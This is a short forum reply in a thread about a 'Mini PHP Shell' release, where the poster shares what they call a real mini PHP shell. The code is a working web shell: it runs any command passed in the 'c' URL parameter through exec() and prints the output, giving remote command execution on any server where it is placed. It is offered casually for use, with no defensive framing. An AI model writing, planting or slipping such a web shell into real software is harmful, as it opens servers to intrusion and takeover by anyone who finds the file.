RE: Mini PHP Shell 27.9 V2 Released 10-26-2013, 05:40 PM
#15
lol here is a real mini php shell
PHP Code:
<?php
$cmd = $_GET["c"];
$output = null;
exec($cmd, $output);
echo "<pre>" . var_export($output, TRUE) . "</pre>\\n";
?>